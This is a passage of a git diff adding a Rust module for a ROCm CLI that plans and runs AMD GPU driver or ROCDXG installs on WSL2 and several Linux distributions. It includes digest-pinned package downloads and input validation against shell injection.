diff --git a/apps/rocm/src/driver_install.rs b/apps/rocm/src/driver_install.rs new file mode 100644 index 000000000..4b2349a4f --- /dev/null +++ b/apps/rocm/src/driver_install.rs @@ -0,0 +1,3359 @@ +// Copyright © Advanced Micro Devices, Inc., or its affiliates. +// +// SPDX-License-Identifier: MIT + +//! `rocm install driver` command handlers and reconciliation. +//! +//! Mechanically relocated from `main.rs` with no behavior change — the +//! `install()` dispatcher's call sites stay byte-identical +//! (`install_driver(...)`/`reconcile_driver_install(...)`, re-imported via +//! `use crate::driver_install::{install_driver, reconcile_driver_install};`). +//! `InstallTarget`/`Cli` remain in the crate root; neither is referenced +//! from this file. Unlike `automations.rs`/`uninstall.rs`, this cluster owns +//! private types (`DriverInstallPlan` and friends) used nowhere else, so +//! those moved here too rather than staying in `main.rs`. + +use std::fmt::Write as _; +use std::fs; +use std::path::{Path, PathBuf}; +use std::process::{Command as ProcessCommand, Stdio}; + +use anyhow::{Context, Result, bail}; +use rocm_core::{AppPaths, ExamineSummary, shell_command_for_host}; +use serde::{Deserialize, Serialize}; + +use crate::cli_report; +use crate::{empty_as_unknown, parse_os_release_field, read_os_release}; + +pub(crate) fn install_driver( + paths: &AppPaths, + dkms: bool, + yes: bool, + dry_run: bool, +) -> std::result::Result { + let examine = + ExamineSummary::gather().map_err(|source| DriverInstallError::new(source, false))?; + let os_release = read_os_release().unwrap_or_default(); + // The only place the real privilege level is read; every builder below takes + // it as a parameter so both branches stay testable on any host. + let plan = + build_driver_install_plan(&examine, &os_release, dkms, PrivilegeEscalation::detect()); + let mut output = render_driver_install_plan(&plan, yes, dry_run); + if !yes || dry_run || !plan.supported || !plan.mutating { + return Ok(DriverInstallResult { + output, + executed: false, + }); + } + + let boot_id = current_boot_id(); + let mut state = DriverInstallState { + approved_at_unix_ms: rocm_core::unix_time_millis(), + executed_at_unix_ms: None, + pre_driver: examine.driver, + post_driver: None, + boot_id_at_execution: boot_id, + reboot_required: plan.reboot_required, + reboot_observed: false, + commands: plan.execution_commands(), + reconciled_at_unix_ms: None, + reconciliation: None, + }; + write_driver_install_state(paths, &state) + .map_err(|source| DriverInstallError::new(source, false))?; + + execute_driver_install_plan( + &plan, + &mut state, + run_driver_shell_command, + |state| write_driver_install_state(paths, state), + || ExamineSummary::gather().map(|summary| summary.driver), + ) + .map_err(|source| DriverInstallError::new(source, true))?; + + let report = cli_report::ActionReport::new("driver install completed") + .detail("reboot_required", plan.reboot_required) + .detail("state", driver_install_state_path(paths).display()); + output.push_str(&report.render()); + Ok(DriverInstallResult { + output, + executed: true, + }) +} + +fn execute_driver_install_plan( + plan: &DriverInstallPlan, + state: &mut DriverInstallState, + mut run: Run, + mut persist: Persist, + gather_post_driver: Gather, +) -> Result<()> +where + Run: FnMut(&str) -> Result<()>, + Persist: FnMut(&DriverInstallState) -> Result<()>, + Gather: FnOnce() -> Result, +{ + for command in &plan.commands { + if plan.reboot_required && command.phase == DriverCommandPhase::Verify { + continue; + } + run(&command.command) + .with_context(|| format!("driver command failed: {}", command.command))?; + } + + state.executed_at_unix_ms = Some(rocm_core::unix_time_millis()); + state.reboot_required = plan.reboot_required; + state.reboot_observed = driver_reboot_observed(state.boot_id_at_execution.as_deref()); + persist(state)?; + + let post_driver = gather_post_driver()?; + state.post_driver = Some(post_driver); + persist(state)?; + Ok(()) +} + +pub(crate) fn reconcile_driver_install(paths: &AppPaths) -> Result { + let Some(mut state) = read_driver_install_state(paths)? else { + let mut output = String::new(); + let _ = writeln!(output, "driver install reconciliation"); + let _ = writeln!( + output, + " state: {}", + driver_install_state_path(paths).display() + ); + let _ = writeln!(output, " approval: not required"); + let _ = writeln!(output, " privileged_commands: "); + let _ = writeln!(output, " status: no prior driver execution state found"); + let _ = writeln!( + output, + " action: run `rocm install driver --dkms` to review the native driver plan" + ); + return Ok(output); + }; + let examine = ExamineSummary::gather()?; + let checks = passive_driver_checks(); + reconcile_driver_install_state(paths, &mut state, examine.driver, current_boot_id(), checks) +} + +fn reconcile_driver_install_state( + paths: &AppPaths, + state: &mut DriverInstallState, + driver: rocm_core::DriverSummary, + current_boot_id: Option, + checks: Vec, +) -> Result { + let reboot_observed = state + .boot_id_at_execution + .as_deref() + .zip(current_boot_id.as_deref()) + .is_some_and(|(executed, current)| executed != current); + state.reboot_observed = reboot_observed; + state.post_driver = Some(driver.clone()); + let at_unix_ms = rocm_core::unix_time_millis(); + state.reconciled_at_unix_ms = Some(at_unix_ms); + let check_summary = summarize_driver_passive_checks(&checks); + state.reconciliation = Some(DriverReconciliationState { + at_unix_ms, + driver, + reboot_observed, + check_summary, + checks, + }); + write_driver_install_state(paths, state)?; + Ok(render_driver_reconciliation(paths, state)) +} + +fn render_driver_reconciliation(paths: &AppPaths, state: &DriverInstallState) -> String { + let mut output = String::new(); + let _ = writeln!(output, "driver install reconciliation"); + let _ = writeln!( + output, + " state: {}", + driver_install_state_path(paths).display() + ); + let _ = writeln!(output, " approval: not required"); + let _ = writeln!(output, " privileged_commands: "); + let _ = writeln!( + output, + " approved_at_unix_ms: {}", + state.approved_at_unix_ms + ); + let _ = writeln!( + output, + " executed_at_unix_ms: {}", + state + .executed_at_unix_ms + .map_or_else(|| "".to_owned(), |value| value.to_string()) + ); + let _ = writeln!(output, " reboot_required: {}", state.reboot_required); + let _ = writeln!(output, " reboot_observed: {}", state.reboot_observed); + if let Some(reconciliation) = &state.reconciliation { + let _ = writeln!( + output, + " reconciled_at_unix_ms: {}", + reconciliation.at_unix_ms + ); + let _ = writeln!(output, " driver_status: {}", reconciliation.driver.status); + let _ = writeln!( + output, + " driver_detail: {}", + reconciliation + .driver + .detail + .as_deref() + .unwrap_or("") + ); + let _ = writeln!( + output, + " passive_check_summary: total={} present={} missing={}", + reconciliation.check_summary.total, + reconciliation.check_summary.present, + reconciliation.check_summary.missing + ); + if reconciliation.checks.is_empty() { + let _ = writeln!(output, " passive_checks: "); + } else { + let _ = writeln!(output, " passive_checks:"); + for check in &reconciliation.checks { + let _ = writeln!( + output, + " {}: {} ({})", + check.name, check.status, check.detail + ); + } + } + if state.reboot_required && !state.reboot_observed { + let _ = writeln!( + output, + " action: reboot is still required before post-install checks are meaningful" + ); + } else if reconciliation + .checks + .iter() + .any(|check| check.status != "present") + { + let _ = writeln!( + output, + " action: reconciliation recorded missing passive checks; run `rocm examine` and inspect driver logs" + ); + } else { + let _ = writeln!( + output, + " action: reconciliation complete; run `rocm examine` for the full host summary" + ); + } + } + output +} + +fn summarize_driver_passive_checks(checks: &[DriverPassiveCheck]) -> DriverPassiveCheckSummary { + let total = checks.len(); + let present = checks + .iter() + .filter(|check| check.status == "present") + .count(); + DriverPassiveCheckSummary { + total, + present, + missing: total.saturating_sub(present), + } +} + +fn passive_driver_checks() -> Vec { + if !rocm_core::runtime_is_linux() { + return Vec::new(); + } + vec![ + passive_path_check("/sys/module/amdgpu", "amdgpu kernel module path"), + passive_path_check("/dev/kfd", "KFD device node"), + passive_render_node_check(), + ] +} + +fn passive_path_check(path: &str, detail: &str) -> DriverPassiveCheck { + DriverPassiveCheck { + name: path.to_owned(), + status: if Path::new(path).exists() { + "present" + } else { + "missing" + } + .to_owned(), + detail: detail.to_owned(), + } +} + +fn passive_render_node_check() -> DriverPassiveCheck { + let present = fs::read_dir("/dev/dri") + .ok() + .into_iter() + .flat_map(|entries| entries.filter_map(std::result::Result::ok)) + .any(|entry| { + entry + .file_name() + .to_str() + .is_some_and(|name| name.starts_with("renderD")) + }); + DriverPassiveCheck { + name: "/dev/dri/renderD*".to_owned(), + status: if present { "present" } else { "missing" }.to_owned(), + detail: "DRM render node".to_owned(), + } +} + +pub(crate) struct DriverInstallResult { + pub(crate) output: String, + pub(crate) executed: bool, +} + +pub(crate) struct DriverInstallError { + pub(crate) source: anyhow::Error, + pub(crate) executed: bool, +} + +impl DriverInstallError { + const fn new(source: anyhow::Error, executed: bool) -> Self { + Self { source, executed } + } +} + +#[derive(Debug, Clone)] +struct DriverInstallPlan { + supported: bool, + mutating: bool, + policy: String, + os_id: String, + version_id: String, + codename: String, + repo_version: String, + reason: String, + preflight_checks: Vec, + commands: Vec, + checks: Vec, + /// Whether the host must reboot before the verification steps mean anything. + /// + /// True for the kernel-module paths: an amdgpu DKMS build is not live until + /// the machine comes back up. False on WSL2, where nothing kernel-side + /// changes — ROCDXG is a userspace library and `ldconfig` publishes it + /// immediately, so telling the user to reboot would be wrong. + reboot_required: bool, +} + +impl DriverInstallPlan { + fn execution_commands(&self) -> Vec { + self.commands + .iter() + .filter(|command| { + matches!( + command.phase, + DriverCommandPhase::Prepare | DriverCommandPhase::Execute + ) + }) + .map(|command| command.command.clone()) + .collect() + } +} + +#[derive(Debug, Clone, Copy, Eq, PartialEq)] +enum DriverCommandPhase { + Prepare, + Execute, + Verify, +} + +#[derive(Debug, Clone)] +struct DriverPlanCommand { + phase: DriverCommandPhase, + command: String, +} + +/// How a generated driver command is expected to reach root. +/// +/// The driver plan is a list of shell lines, so escalation is a text prefix +/// rather than an argv decision (contrast `openmpi::InstallCommand`, whose +/// commands are argv vectors and can prepend `sudo` structurally). Prefixing +/// unconditionally is what made `install driver` unusable on the hosts it is +/// most needed on: containers and minimal cloud images run as uid 0 with no +/// `sudo` binary, so every command died with `sudo: not found` before any +/// driver work happened. +/// +/// This is resolved when the plan is BUILT, not when it runs, so that the plan +/// `--dry-run` prints, the plan the approval prompt shows, and the commands +/// persisted into `state.json` are all the commands that actually execute. +#[derive(Debug, Clone, Copy, Eq, PartialEq)] +enum PrivilegeEscalation { + /// Not root: privileged commands need a `sudo` prefix. + Sudo, + /// Already uid 0: `sudo` is unnecessary, and may not even be installed. + AlreadyRoot, +} + +impl PrivilegeEscalation { + /// Read the current process's privilege level. + /// + /// Only ever called on the production path; every plan builder takes the + /// escalation as a parameter so both branches are testable on any host. + fn detect() -> Self { + if rocm_core::openmpi::running_as_root() { + Self::AlreadyRoot + } else { + Self::Sudo + } + } + + /// The prefix to place before a command that must run as root — `"sudo "`, + /// or nothing at all when the process already is root. Includes the + /// trailing space so it composes directly into a command string. + const fn prefix(self) -> &'static str { + match self { + Self::Sudo => "sudo ", + Self::AlreadyRoot => "", + } + } + + /// Whether a plan built under this escalation depends on `sudo` being + /// installed. Drives the preflight list, so it does not claim a + /// precondition the plan is not relying on. + const fn needs_sudo_binary(self) -> bool { + matches!(self, Self::Sudo) + } +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +struct DriverInstallState { + approved_at_unix_ms: u128, + executed_at_unix_ms: Option, + pre_driver: rocm_core::DriverSummary, + post_driver: Option, + boot_id_at_execution: Option, + reboot_required: bool, + reboot_observed: bool, + commands: Vec, + #[serde(default)] + reconciled_at_unix_ms: Option, + #[serde(default)] + reconciliation: Option, +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +struct DriverReconciliationState { + at_unix_ms: u128, + driver: rocm_core::DriverSummary, + reboot_observed: bool, + #[serde(default)] + check_summary: DriverPassiveCheckSummary, + checks: Vec, +} + +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +struct DriverPassiveCheckSummary { + total: usize, + present: usize, + missing: usize, +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +struct DriverPassiveCheck { + name: String, + status: String, + detail: String, +} + +/// Release of ROCDXG installed on WSL2, overridable for trying another build. +/// +/// Resolved once at plan-build time via [`resolve_shell_default_template`], the +/// same way `ROCM_CLI_AMDGPU_VERSION` is handled for the bare-metal repository +/// pin. The concrete value is baked into the archive name, the release URL and +/// the `repo_version:` line, so the plan a user reviews names the build the +/// install will actually fetch rather than an unexpanded `${...}` placeholder. +/// +/// How the default is chosen: the newest non-prerelease `librocdxg` release +/// whose `rocdxg-roct` digest is pinned in [`ROCDXG_PINNED_DIGESTS`]. Moving it +/// is two edits — add the `(version, digest)` row to that table, then change +/// the literal here — and the two must move together: a default with no row +/// makes [`resolve_rocdxg_verification`] refuse to build a plan at all unless +/// the caller supplies a digest, so a bump that forgets the table breaks every +/// default WSL install rather than falling back to the previous release. +/// +/// Deliberately out of scope: `rocdxg-amd-smi-lib__amd64.deb`, which +/// v1.2.1 and v1.2.2 ship alongside `rocdxg-roct` and the five releases before +/// them do not, is not installed here. It is a second prefix under +/// `/opt/rocm-wsl` carrying its own `amd-smi` and `libamd_smi.so`, and it +/// installs an `/etc/profile.d` entry that sources the package's own +/// `/opt/rocm-wsl/.env.sh`, which in turn prepends that prefix to `PATH` and +/// `LD_LIBRARY_PATH` for new login shells. That is a system-wide environment +/// change in service of a monitoring utility that neither `wsl_rocdxg_ready` +/// nor `rocm serve` depends on, and it is not available for every version in +/// the pinned table. Installing it is a separate decision that belongs behind +/// its own opt-in, not folded into the plan whose job is to supply the runtime +/// bridge. +const ROCDXG_VERSION_EXPR: &str = "${ROCM_CLI_ROCDXG_VERSION:-1.2.2}"; + +/// Supplies a SHA-256 digest for the ROCDXG package, overriding the pinned one. +/// Required when installing a version this build has no digest for. +const ROCDXG_SHA256_ENV: &str = "ROCM_CLI_ROCDXG_SHA256"; + +/// Opts out of digest verification entirely, when set to an affirmative value. +/// Named explicitly so that shipping an unverified root install is a deliberate +/// act with an audit trail in the plan, rather than what happens when a variable +/// is simply unset. +const ROCDXG_ALLOW_UNVERIFIED_ENV: &str = "ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED"; + +/// SHA-256 digests of the `rocdxg-roct` package shipped with each published +/// ROCDXG release, taken from the release host's own asset metadata. +/// +/// These exist so the default install is authenticated. The package is fetched +/// over plain HTTPS from a release page and then handed to `apt-get install`, +/// which runs its maintainer scripts as root — so without a digest, TLS to the +/// download host is the only thing standing between a compromised or swapped +/// artifact and root on the user's machine. That is materially weaker than the +/// bare-metal apt path in this same file, which installs from a repository +/// pinned with `signed-by=/etc/apt/keyrings/rocm.gpg`. +/// +/// A version absent from this table is not installed unless the caller supplies +/// a digest via `ROCM_CLI_ROCDXG_SHA256` or opts out via +/// `ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED`; see [`resolve_rocdxg_verification`]. +/// Add the new pair here when pinning a newer release. Nothing in the tree +/// checks a row against the published artifact, so a mistyped digest surfaces +/// only as a failed install on a WSL host — fail-closed, but confusing. Take +/// the value from the release's own asset metadata, or recompute it: +/// +/// ```text +/// curl -L --fail \ +/// https://github.com/ROCm/librocdxg/releases/download/v/rocdxg-roct__amd64.deb \ +/// | sha256sum +/// ``` +const ROCDXG_PINNED_DIGESTS: &[(&str, &str)] = &[ + ( + "1.0.0", + "5e78d300dfb8c10dfd57de24b312ff9f9962a3a971f571e5e9383e1c543b607a", + ), + ( + "1.1.0", + "d1f92415d218ca10df3c39f2ce48872ee968549a97191e987f2c2a79ab709f23", + ), + ( + "1.1.1", + "cd2ba9dbfd32bf35755a45e7e92410524f32baa2b4dcc31d0106876d04c3abcc", + ), + ( + "1.1.2", + "e426a5f58f4f177512a354ed5f0dd7b2c0a2b736f009e09bf806edf18ca6cb97", + ), + ( + "1.2.0", + "3ed9526719290cd8f590150dad8ea0f234fa779bea6a4c9a8449d7ae6b8cfb6e", + ), + ( + "1.2.1", + "7889eef45a1132ed2dde88d8ea1356bf791ec9c05802a18940bc81b970e850e0", + ), + ( + "1.2.2", + "28ded1254811192ebace1f76c0227580184af7b27ab2475fb9728295a702d541", + ), +]; + +/// Whether a resolved ROCDXG version is safe to place in the plan's commands. +/// +/// The driver plan is a list of shell lines run through `sh -c`, and the +/// version is interpolated into three of them — the archive name, the release +/// URL and the local path — each of which is then executed with `sudo` already +/// primed by an earlier `apt-get update`. `ROCM_CLI_ROCDXG_VERSION` reaches +/// this unchanged from the environment, so a value containing `;` or a +/// backtick would otherwise end the intended command and start an attacker's +/// own. Restricting it to characters that appear in a Debian package version +/// removes the possibility rather than trying to escape it. +fn rocdxg_version_is_well_formed(version: &str) -> bool { + !version.is_empty() + && version.starts_with(|c: char| c.is_ascii_alphanumeric()) + && version + .chars() + .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '+' | '-' | '~')) +} + +/// Whether a string is a bare lowercase 64-character hex SHA-256 digest, the +/// form `sha256sum -c -` expects. +fn sha256_digest_is_well_formed(digest: &str) -> bool { + digest.len() == 64 && digest.chars().all(|c| c.is_ascii_hexdigit()) +} + +/// How the downloaded ROCDXG package will be authenticated before it is +/// installed as root. +#[derive(Debug, Clone, Eq, PartialEq)] +enum RocdxgVerification { + /// Check the download against this digest and abort the install on a + /// mismatch. + Digest(String), + /// Install without checking, because the caller explicitly asked for it. + OptedOut, +} + +/// Decide how a ROCDXG download will be authenticated, or `Err` with the reason +/// no plan can be built. +/// +/// Resolution order — an explicit digest wins over the pinned one so a user can +/// install an artifact this build predates without having to disable +/// verification wholesale: +/// +/// 1. `ROCM_CLI_ROCDXG_SHA256`, when it is a well-formed digest. +/// 2. The digest pinned for this version in [`ROCDXG_PINNED_DIGESTS`]. +/// 3. `ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED`, when set to an affirmative value +/// — see [`crate::therock::truthy_env`] for the exact allowlist — which opts +/// out. `0` and `false` do not. +/// +/// Nothing left means refusal. Verification is therefore opt-*out*: the failure +/// mode of an unset variable is a plan that will not run, not a root install of +/// an unauthenticated package. +fn resolve_rocdxg_verification(version: &str) -> Result { + if let Some(supplied) = std::env::var(ROCDXG_SHA256_ENV) + .ok() + .map(|value| value.trim().to_ascii_lowercase()) + .filter(|value| !value.is_empty()) + { + if !sha256_digest_is_well_formed(&supplied) { + return Err(format!( + "{ROCDXG_SHA256_ENV} is not a 64-character hex SHA-256 digest; refusing to install ROCDXG without a usable digest." + )); + } + return Ok(RocdxgVerification::Digest(supplied)); + } + + if let Some(pinned) = ROCDXG_PINNED_DIGESTS + .iter() + .find_map(|(pinned_version, digest)| (*pinned_version == version).then_some(*digest)) + { + return Ok(RocdxgVerification::Digest(pinned.to_owned())); + } + + // An allowlist of affirmative values, not "set to anything non-empty": + // otherwise `ROCM_CLI_ROCDXG_ALLOW_UNVERIFIED=0` — which every reader takes + // for "off" — would turn digest checking off for a package installed as + // root. Anything this does not recognise leaves verification on. + if crate::therock::truthy_env(ROCDXG_ALLOW_UNVERIFIED_ENV) { + return Ok(RocdxgVerification::OptedOut); + } + + Err(format!( + "no known SHA-256 digest for ROCDXG {version}, and this package is installed as root. Set {ROCDXG_SHA256_ENV} to the digest published with that release, or set {ROCDXG_ALLOW_UNVERIFIED_ENV}=1 to install without verifying it." + )) +} + +/// A WSL plan that cannot be run, carrying the reason in the same shape every +/// other unsupported plan uses so `--dry-run`, the approval prompt and +/// `state.json` all report it identically. +fn wsl_rocdxg_refusal_plan(repo_version: String, reason: String) -> DriverInstallPlan { + DriverInstallPlan { + supported: false, + mutating: false, + policy: "wsl_rocdxg".to_owned(), + os_id: "wsl".to_owned(), + version_id: String::new(), + codename: String::new(), + repo_version, + reason, + preflight_checks: Vec::new(), + commands: Vec::new(), + checks: vec!["rocm examine".to_owned(), "rocm diagnose".to_owned()], + reboot_required: false, + } +} + +/// The `rocm install driver` plan for a WSL2 host. +/// +/// WSL2 has no in-tree amdgpu driver to install: the GPU comes from the Windows +/// host driver through `/dev/dxg`, and what ROCm needs on the Linux side is +/// ROCDXG (`librocdxg`), which bridges the runtime to it. Without that library +/// `rocm examine` reports `wsl_rocdxg_missing` and `rocm serve` refuses with +/// "no usable AMD GPU detected", even though a gfx target is detected — the +/// target is read from the Windows-side driver. +/// +/// This used to be a refusal pointing at a shell script under `scripts/`, which +/// ships only in a git checkout — never in the release bundle — so it was a dead +/// end for anyone who installed the CLI normally. These are that script's steps; +/// it has been removed rather than left as a second, untested copy of them. +fn wsl_rocdxg_driver_plan(escalation: PrivilegeEscalation) -> DriverInstallPlan { + let version = resolve_shell_default_template(ROCDXG_VERSION_EXPR); + if !rocdxg_version_is_well_formed(&version) { + return wsl_rocdxg_refusal_plan( + // The rejected value is still rendered into the plan's + // `repo_version:` line so the user can see what was refused — but + // that line is part of a plan a human reads to decide, and a raw + // value containing a newline could forge further lines in it. The + // debug form escapes newlines and makes trailing space visible, + // which is exactly what is wanted for a value being shown as + // rejected. + format!("{version:?}"), + "ROCM_CLI_ROCDXG_VERSION is not a well-formed package version. It is interpolated into privileged shell commands, so only letters, digits, and `. + - ~` are accepted.".to_owned(), + ); + } + let verification = match resolve_rocdxg_verification(&version) { + Ok(verification) => verification, + Err(reason) => return wsl_rocdxg_refusal_plan(version, reason), + }; + + let sudo = escalation.prefix(); + let deb = format!("rocdxg-roct_{version}_amd64.deb"); + let url = format!("https://github.com/ROCm/librocdxg/releases/download/v{version}/{deb}"); + let deb_path = format!("/tmp/{deb}"); + // `version` is validated above and the digest is hex, so neither can carry + // shell metacharacters; the quotes keep that guarantee local to the command + // rather than resting on a check several functions away. + let verify_download = match &verification { + RocdxgVerification::Digest(digest) => driver_command( + DriverCommandPhase::Execute, + &format!("printf '%s %s\\n' '{digest}' '{deb_path}' | sha256sum -c -"), + ), + RocdxgVerification::OptedOut => driver_command( + DriverCommandPhase::Execute, + &format!( + "echo 'warning: installing ROCDXG {version} without verifying it ({ROCDXG_ALLOW_UNVERIFIED_ENV} is set)' >&2" + ), + ), + }; + DriverInstallPlan { + supported: true, + mutating: true, + policy: "wsl_rocdxg".to_owned(), + os_id: "wsl".to_owned(), + version_id: String::new(), + codename: String::new(), + repo_version: version, + reason: + "WSL2 uses the Windows host driver plus ROCDXG, not Linux DKMS; this installs ROCDXG." + .to_owned(), + // Read, not run: the GPU plumbing belongs to the WSL platform, so if it + // is absent the fix is on the Windows side and no Linux package helps. + // The Execute phase fails on the same two paths rather than installing + // a library with nothing to bind to. + preflight_checks: { + let mut checks = vec![ + "/dev/dxg (WSL GPU device)".to_owned(), + "/usr/lib/wsl/lib/libdxcore.so (WSL dxcore runtime)".to_owned(), + ]; + checks.extend(driver_root_preflight_checks(escalation)); + checks + }, + commands: vec![ + driver_command( + DriverCommandPhase::Prepare, + "test -e /dev/dxg || { echo 'error: /dev/dxg is missing; WSL GPU plumbing is not available' >&2; exit 1; }", + ), + driver_command( + DriverCommandPhase::Prepare, + "test -e /usr/lib/wsl/lib/libdxcore.so || { echo 'error: /usr/lib/wsl/lib/libdxcore.so is missing' >&2; exit 1; }", + ), + // Say why up front rather than letting the first privileged step die + // with `sudo: command not found`, which reads like a broken plan. + // Skipped when already root: the plan emits no `sudo` at all then, + // so demanding the binary would state a precondition it is not + // relying on. + driver_command( + DriverCommandPhase::Prepare, + if escalation.needs_sudo_binary() { + "command -v sudo >/dev/null 2>&1 || { echo 'error: sudo is required to install ROCDXG under /opt/rocm' >&2; exit 1; }" + } else { + "test \"$(id -u)\" -eq 0 || { echo 'error: this plan was built to run as root' >&2; exit 1; }" + }, + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}apt-get update"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}apt-get install -y ca-certificates curl"), + ), + driver_command( + DriverCommandPhase::Execute, + &format!("curl -L --fail --show-error --output '{deb_path}' '{url}'"), + ), + // Authenticating the download is the whole trust anchor for this + // plan: everything after it runs the package's maintainer scripts + // as root. `sha256sum -c -` exits non-zero on a mismatch, which + // aborts the plan before the install step. + verify_download, + driver_command( + DriverCommandPhase::Execute, + &format!("{sudo}apt-get install -y '{deb_path}'"), + ), + driver_command(DriverCommandPhase::Execute, &format!("{sudo}ldconfig")), + driver_command( + DriverCommandPhase::Verify, + "test -e /opt/rocm/lib/librocdxg.so", + ), + driver_command( + DriverCommandPhase::Verify, + "ldconfig -p | grep -q 'librocdxg\\.so'", + ), + ], + // `rocm diagnose` carries the WSL catalog, including the host-side + // form that inspects a distro over `wsl.exe` without needing anything + // installed inside it. + checks: vec!["rocm examine".to_owned(), "rocm diagnose".to_owned()], + // Userspace only: `ldconfig` publishes the library in this boot. + reboot_required: false, + } +} + +fn build_driver_install_plan( + examine: &ExamineSummary, + os_release_text: &str, + dkms: bool, + escalation: PrivilegeEscalation, +) -> DriverInstallPlan { + // Resolve the AMD graphics version and amdgpu-install package release once, + // here at plan-build time, so the concrete values are baked into both the + // human-readable summary and every command the plan runs. Keeping shell + // `${VAR:-default}` templates in the commands used to be load-bearing, but + // AMD's apt `sources.list` line embeds the template inside POSIX single + // quotes, which suppress all expansion — so the literal `${...}` would land + // in the repo file. Resolving up front fixes that and keeps the summary and + // the executed commands in agreement. + let repo_version = resolve_shell_default_template("${ROCM_CLI_AMDGPU_VERSION:-7.2.4}"); + let package_release = + resolve_shell_default_template("${ROCM_CLI_AMDGPU_PACKAGE_RELEASE:-70204}"); + if examine.os == "windows" { + return DriverInstallPlan { + supported: false, + mutating: false, + policy: "windows_validate_only".to_owned(), + os_id: "windows".to_owned(), + version_id: String::new(), + codename: String::new(), + repo_version, + reason: "Windows driver install is validate-only in rocm-cli; use `rocm examine` to inspect the AMD display driver.".to_owned(), + preflight_checks: Vec::new(), + commands: Vec::new(), + checks: vec!["rocm examine".to_owned()], + reboot_required: true, + }; + } + if examine.wsl.as_ref().is_some_and(|wsl| wsl.is_wsl) { + return wsl_rocdxg_driver_plan(escalation); + } + + let os_id = parse_os_release_field(os_release_text, "ID").unwrap_or_default(); + let version_id = parse_os_release_field(os_release_text, "VERSION_ID").unwrap_or_default(); + let codename = parse_os_release_field(os_release_text, "VERSION_CODENAME") + .or_else(|| parse_os_release_field(os_release_text, "UBUNTU_CODENAME")) + .or_else(|| codename_for_version(&os_id, &version_id).map(str::to_owned)) + .unwrap_or_default(); + let id_like = parse_os_release_field(os_release_text, "ID_LIKE").unwrap_or_default(); + + match (os_id.as_str(), version_id.as_str()) { + ("ubuntu", "22.04" | "24.04") => apt_driver_plan( + os_id, + version_id, + codename, + repo_version, + dkms, + true, + escalation, + ), + ("debian", "12" | "13") => { + let repo_codename = if version_id == "13" { "noble" } else { "jammy" }; + let mut plan = apt_driver_plan( + os_id, + version_id, + repo_codename.to_owned(), + repo_version, + dkms, + false, + escalation, + ); + // Debian deliberately reuses AMD's Ubuntu-suite repository: AMD's + // documented Debian install maps Debian 12 -> jammy and 13 -> noble + // and serves them from the .../ubuntu graphics tree. Surface that in + // the plan so the Ubuntu codename on a Debian host doesn't read as a + // misdetection. + plan.reason = format!( + "Debian intentionally uses AMD's Ubuntu-suite repository (codename {repo_codename}), per AMD's documented Debian install; the Ubuntu codename is deliberate, not a misdetection. {}", + plan.reason + ); + plan + } + ("rhel", "10.1" | "10.0" | "9.7" | "9.6" | "9.4" | "8.10") => dnf_driver_plan( + os_id, + version_id, + codename, + repo_version, + package_release, + dkms, + DnfDriverDistro::Rhel, + escalation, + ), + ("ol", "10.1" | "9.7" | "8.10") => dnf_driver_plan( + os_id, + version_id, + codename, + repo_version, + package_release, + dkms, + DnfDriverDistro::Oracle, + escalation, + ), + ("rocky", "9.4" | "9.6" | "9.7") => dnf_driver_plan( + os_id, + version_id, + codename, + repo_version, + package_release, + dkms, + DnfDriverDistro::Rocky, + escalation, + ), + ("sles" | "sle", "15.7") => { + sles_driver_plan( + os_id, + version_id, + codename, + repo_version, + package_release, + dkms, + escalation, + ) + } + _ => driver_plan_via_id_like( + &os_id, + &version_id, + &id_like, + &codename, + &repo_version, + &package_release, + dkms, + escalation, + ) + .unwrap_or_else(|| DriverInstallPlan { + supported: false, + mutating: false, + policy: "unsupported_linux_dkms_plan".to_owned(), + os_id, + version_id, + codename, + repo_version, + reason: "Linux DKMS driver install is currently planned only for AMD-documented Ubuntu, Debian, RHEL, Oracle Linux, SLES, and Rocky versions; no commands were guessed for this distro.".to_owned(), + preflight_checks: Vec::new(), + commands: Vec::new(), + checks: vec!["rocm examine".to_owned()], + // Kernel module: not live until the machine comes back up. + reboot_required: true, + }), + } +} + +/// Select a driver install plan for a distro whose `/etc/os-release` `ID` is not +/// an AMD-documented distro, by falling back to its `ID_LIKE` base family. +/// +/// This mirrors the family resolution already used by the OpenMPI and system +/// dependency install plans in [`rocm_core::openmpi`], which honor `ID_LIKE`. A +/// derivative is matched only when its `VERSION_ID` aligns with an AMD-documented +/// version of the base family, so version-misaligned derivatives still fall +/// through to the unsupported plan rather than fabricating a repository URL that +/// would 404. +// Every parameter is one already-resolved fact the plan is templated from; +// bundling them into a struct would only move the same list one level out. +#[allow(clippy::too_many_arguments)] +fn driver_plan_via_id_like( + os_id: &str, + version_id: &str, + id_like: &str, + codename: &str, + repo_version: &str, + package_release: &str, + dkms: bool, + escalation: PrivilegeEscalation, +) -> Option { + let likes: Vec = id_like + .split_whitespace() + .map(str::to_ascii_lowercase) + .collect(); + let mentions = |family: &str| likes.iter().any(|like| like == family); + + // Ubuntu-family derivatives that reuse Ubuntu's VERSION_ID (e.g. Pop!_OS) + // also reuse its repositories; the amdgpu apt line always targets the + // `ubuntu/` repo, so the plan is identical to the Ubuntu base. + // Derivatives with their own version scheme (e.g. Linux Mint's "22") do not + // match here and remain unsupported rather than guessing a codename. + if mentions("ubuntu") && matches!(version_id, "22.04" | "24.04") { + let codename = if codename.is_empty() { + codename_for_version("ubuntu", version_id) + .unwrap_or_default() + .to_owned() + } else { + codename.to_owned() + }; + return Some(apt_driver_plan( + os_id.to_owned(), + version_id.to_owned(), + codename, + repo_version.to_owned(), + dkms, + true, + escalation, + )); + } + + // Debian-family derivatives that share Debian's version scheme map to the + // matching Ubuntu repo codename, exactly like the Debian base. + if mentions("debian") && matches!(version_id, "12" | "13") { + let repo_codename = if version_id == "13" { "noble" } else { "jammy" }; + return Some(apt_driver_plan( + os_id.to_owned(), + version_id.to_owned(), + repo_codename.to_owned(), + repo_version.to_owned(), + dkms, + false, + escalation, + )); + } + + // Enterprise-Linux rebuilds (e.g. AlmaLinux) reuse RHEL's version scheme and + // standard (RHCK, non-UEK) kernels, but are served from the vendor-neutral + // `el/` repository path rather than 